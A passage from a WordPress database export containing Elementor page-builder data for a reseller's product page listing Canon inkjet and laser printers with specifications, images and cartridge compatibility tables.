width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6939,3304,'_elementor_version','2.5.14'),(6942,3305,'_wp_page_template','template-fullwidth.php'),(6943,3305,'_elementor_edit_mode','builder'),(6944,3305,'_elementor_template_type','post'),(6945,3305,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9b84d1c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"89b9be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"11\",\"right\":\"11\",\"bottom\":\"11\",\"left\":\"11\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td 